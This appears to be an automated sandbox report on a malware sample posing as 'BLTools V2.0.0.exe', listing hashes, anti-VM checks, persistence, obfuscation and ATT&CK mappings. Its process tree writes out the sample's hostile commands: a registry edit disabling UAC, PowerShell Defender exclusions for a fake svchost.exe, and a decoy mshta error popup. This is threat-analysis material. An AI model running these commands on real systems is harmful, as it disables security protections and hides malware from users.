Analysis
-
max time kernel
24s -
max time network
37s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system -
submitted
16-04-2024 00:52
Static task
static1
Behavioral task
behavioral1
Sample
BLTools V2.0.0.exe
Resource
win10v2004-20240412-en
Errors
General
-
Target
BLTools V2.0.0.exe
-
Size
7.4MB
-
MD5
1a8902cd60c38c8e2f0e752d45627dd9
-
SHA1
3e5767b0243ff466ba6db2974e4a87a295419cd4
-
SHA256
5c5f543002e61369b783a15a504231dc794359c41c0054655f04a3596e6124d8
-
SHA512
0951af3fe1c76e3b34b39a9f9b6d419896dfcb14f004646b769d8171cbe57aa2661d595dce35b9da31d9e509e190f00fa0e08c712ed422b98f0848cb11a64a45
-
SSDEEP
196608:7dg6mgSSRoyMU48mrvL/m9jmAD8SQQ6DIxp:XayR48SviwUyDIxp
Malware Config
Signatures
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
Processes:
resource yara_rule behavioral1/memory/3648-109-0x000000001DB50000-0x000000001DB5E000-memory.dmp disable_win_def -
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
svchost.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ svchost.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
svchost.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion svchost.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
BLTools V2.0.0.exesvchost.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\Control Panel\International\Geo\Nation BLTools V2.0.0.exe Key value queried \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\Control Panel\International\Geo\Nation svchost.exe -
Drops startup file 2 IoCs
Processes:
svchost.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk svchost.exe -
Executes dropped EXE 1 IoCs
Processes:
svchost.exepid process 3648 svchost.exe -
Loads dropped DLL 1 IoCs
Processes:
svchost.exepid process 3648 svchost.exe -
Obfuscated with Agile.Net obfuscator 2 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
Processes:
resource yara_rule C:\ProgramData\svchost.exe agile_net behavioral1/memory/3648-16-0x00000000001D0000-0x00000000008D6000-memory.dmp agile_net -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\090696db-b33c-464d-914f-162d19381fdb\AgileDotNetRT64.dll themida behavioral1/memory/3648-25-0x00007FFF45A90000-0x00007FFF46614000-memory.dmp themida behavioral1/memory/3648-32-0x00007FFF45A90000-0x00007FFF46614000-memory.dmp themida behavioral1/memory/3648-104-0x00007FFF45A90000-0x00007FFF46614000-memory.dmp themida behavioral1/memory/3648-106-0x00007FFF45A90000-0x00007FFF46614000-memory.dmp themida behavioral1/memory/3648-108-0x00007FFF45A90000-0x00007FFF46614000-memory.dmp themida -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
svchost.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe" svchost.exe -
Processes:
svchost.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA svchost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
svchost.exepid process 3648 svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exesvchost.exepid process 916 powershell.exe 916 powershell.exe 916 powershell.exe 2216 powershell.exe 2216 powershell.exe 2216 powershell.exe 244 powershell.exe 244 powershell.exe 244 powershell.exe 636 powershell.exe 636 powershell.exe 3648 svchost.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
svchost.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3648 svchost.exe Token: SeDebugPrivilege 916 powershell.exe Token: SeDebugPrivilege 2216 powershell.exe Token: SeDebugPrivilege 244 powershell.exe Token: SeDebugPrivilege 636 powershell.exe Token: SeShutdownPrivilege 3648 svchost.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
svchost.exepid process 3648 svchost.exe -
Suspicious use of WriteProcessMemory 38 IoCs
Processes:
BLTools V2.0.0.execmd.execmd.execmd.exesvchost.exedescription pid process target process PID 3968 wrote to memory of 4728 3968 BLTools V2.0.0.exe cmd.exe PID 3968 wrote to memory of 4728 3968 BLTools V2.0.0.exe cmd.exe PID 3968 wrote to memory of 3648 3968 BLTools V2.0.0.exe svchost.exe PID 3968 wrote to memory of 3648 3968 BLTools V2.0.0.exe svchost.exe PID 4728 wrote to memory of 4828 4728 cmd.exe chcp.com PID 4728 wrote to memory of 4828 4728 cmd.exe chcp.com PID 4728 wrote to memory of 3684 4728 cmd.exe cmd.exe PID 4728 wrote to memory of 3684 4728 cmd.exe cmd.exe PID 4728 wrote to memory of 3200 4728 cmd.exe find.exe PID 4728 wrote to memory of 3200 4728 cmd.exe find.exe PID 4728 wrote to memory of 5096 4728 cmd.exe find.exe PID 4728 wrote to memory of 5096 4728 cmd.exe find.exe PID 4728 wrote to memory of 4212 4728 cmd.exe findstr.exe PID 4728 wrote to memory of 4212 4728 cmd.exe findstr.exe PID 4728 wrote to memory of 2448 4728 cmd.exe findstr.exe PID 4728 wrote to memory of 2448 4728 cmd.exe findstr.exe PID 4728 wrote to memory of 1264 4728 cmd.exe findstr.exe PID 4728 wrote to memory of 1264 4728 cmd.exe findstr.exe PID 4728 wrote to memory of 5056 4728 cmd.exe findstr.exe PID 4728 wrote to memory of 5056 4728 cmd.exe findstr.exe PID 4728 wrote to memory of 4984 4728 cmd.exe cmd.exe PID 4728 wrote to memory of 4984 4728 cmd.exe cmd.exe PID 4728 wrote to memory of 2428 4728 cmd.exe cmd.exe PID 4728 wrote to memory of 2428 4728 cmd.exe cmd.exe PID 4728 wrote to memory of 4604 4728 cmd.exe cmd.exe PID 4728 wrote to memory of 4604 4728 cmd.exe cmd.exe PID 2428 wrote to memory of 4440 2428 cmd.exe mshta.exe PID 2428 wrote to memory of 4440 2428 cmd.exe mshta.exe PID 4604 wrote to memory of 3004 4604 cmd.exe reg.exe PID 4604 wrote to memory of 3004 4604 cmd.exe reg.exe PID 3648 wrote to memory of 916 3648 svchost.exe powershell.exe PID 3648 wrote to memory of 916 3648 svchost.exe powershell.exe PID 3648 wrote to memory of 2216 3648 svchost.exe powershell.exe PID 3648 wrote to memory of 2216 3648 svchost.exe powershell.exe PID 3648 wrote to memory of 244 3648 svchost.exe powershell.exe PID 3648 wrote to memory of 244 3648 svchost.exe powershell.exe PID 3648 wrote to memory of 636 3648 svchost.exe powershell.exe PID 3648 wrote to memory of 636 3648 svchost.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\BLTools V2.0.0.exe"C:\Users\Admin\AppData\Local\Temp\BLTools V2.0.0.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3968 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\z.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:4728 -
C:\Windows\system32\chcp.comchcp.com 4373⤵PID:4828
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c type tmp3⤵PID:3684
-
-
C:\Windows\system32\find.exefind3⤵PID:3200
-
-
C:\Windows\system32\find.exefind3⤵PID:5096
-
-
C:\Windows\system32\findstr.exefindstr /L /I set "C:\ProgramData\z.bat"3⤵PID:4212
-
-
C:\Windows\system32\findstr.exefindstr /L /I goto "C:\ProgramData\z.bat"3⤵PID:2448
-
-
C:\Windows\system32\findstr.exefindstr /L /I echo "C:\ProgramData\z.bat"3⤵PID:1264
-
-
C:\Windows\system32\findstr.exefindstr /L /I pause "C:\ProgramData\z.bat"3⤵PID:5056
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c type tmp3⤵PID:4984
-
-
C:\Windows\system32\cmd.execmd.exe /c mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The instruction at 0x00000000771034FB referenced memory at 0x00000000771034FB. The required data was not placed into memory because of an I/O error status of 0x0000428. Click on OK to terminate the program', 0, 'Application Error', 0+16);close()"3⤵
- Suspicious use of WriteProcessMemory
PID:2428 -
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The instruction at 0x00000000771034FB referenced memory at 0x00000000771034FB. The required data was not placed into memory because of an I/O error status of 0x0000428. Click on OK to terminate the program', 0, 'Application Error', 0+16);close()"4⤵PID:4440
-
-
-
C:\Windows\system32\cmd.execmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- Suspicious use of WriteProcessMemory
PID:4604 -
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- UAC bypass
PID:3004
-
-
-
-
C:\ProgramData\svchost.exe"C:\ProgramData\svchost.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3648 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svchost.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:916
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2216
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:244
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:636
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
1Disable or Modify Tools
1Modify Registry
2Virtualization/Sandbox Evasion
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7.0MB
MD5a0079957ed4f0fd54efedbbefd68acc9
SHA1fc431b4b57cbfe3904a94b1109fe071c70ae8c1d
SHA256da024be4bca9495f0d6f960db46a429a4350d9395af9379323dea376f3296830
SHA512896cc7f3b80f1366c5b324cc9ed991eed323b8fa50a0f24d4a672e93e142fbc0bb27f9496858b1daab44c67c6d5a3184bb38353467c7c5111cecbbfb6876dedd
-
Filesize
14B
MD5ce585c6ba32ac17652d2345118536f9c
SHA1be0e41b3690c42e4c0cdb53d53fc544fb46b758d
SHA256589c942e748ea16dc86923c4391092707ce22315eb01cb85b0988c6762aa0ed3
SHA512d397eda475d6853ce5cc28887690ddd5f8891be43767cdb666396580687f901fb6f0cc572afa18bde1468a77e8397812009c954f386c8f69cc0678e1253d5752
-
Filesize
20KB
MD577946ef866ba3e46fb161bc52214c616
SHA120a53a00be7f4c76e3a1b02eb82675f7b8e77a0c
SHA2560562794443d5322e9271dbdce3af9b3ba5e14e831077796552f0d507e836c48f
SHA512b5671ee7de190613ff6095b564283c5b689008c79eab91ab39d95241dfed797ca61ee196bebbac4d481e5c0e4330bc6de40d7486f4d7eb8e0fcb01a734e1cbdb
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD52979eabc783eaca50de7be23dd4eafcf
SHA1d709ce5f3a06b7958a67e20870bfd95b83cad2ea
SHA256006cca90e78fbb571532a83082ac6712721a34ea4b21f490058ffb3f521f4903
SHA51292bc433990572d9427d0c93eef9bd1cc23fa00ed60dd0c9c983d87d3421e02ce3f156c6f88fe916ef6782dbf185cbce083bc0094f8c527f302be6a37d1c53aba
-
Filesize
944B
MD5e60eb305a7b2d9907488068b7065abd3
SHA11643dd7f915ac50c75bc01c53d68c5dafb9ce28d
SHA256ad07460e061642c0dd4e7dfa7b821aacce873e290389e72f708e9f3504f9d135
SHA51295c45afec6fa4e0b2a21edd10a6b2dc30568810c67bc9bc34d98ab111c48261f377a370583adb27e08616b0108026c119493b1b093b52ce931117e646b46cb7b
-
Filesize
944B
MD567e8893616f805af2411e2f4a1411b2a
SHA139bf1e1a0ddf46ce7c136972120f512d92827dcd
SHA256ca0dfe104c1bf27f7e01999fcdabc16c6400c3da937c832c26bdbca322381d31
SHA512164e911a9935e75c8be1a6ec3d31199a16ba2a1064da6c09d771b2a38dd7fddd142301ef55d67d90f306d3a454a1ce7b72e129ea42e44500b9b8c623a8d98b4d
-
Filesize
4.2MB
MD505b012457488a95a05d0541e0470d392
SHA174f541d6a8365508c794ef7b4ac7c297457f9ce3
SHA2561f77a0749ac730500f203b8c4d072587923ac679e184a3859aeb855c2a2e7d8d
SHA5126d6e7b838d4425d49ac8d3738135374ef5357f0677b07cecb7afbf5feddc1997bf6dce68d48787eff8a74c4728def8880c8f01842eda35b5815fb561fa401ae6
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82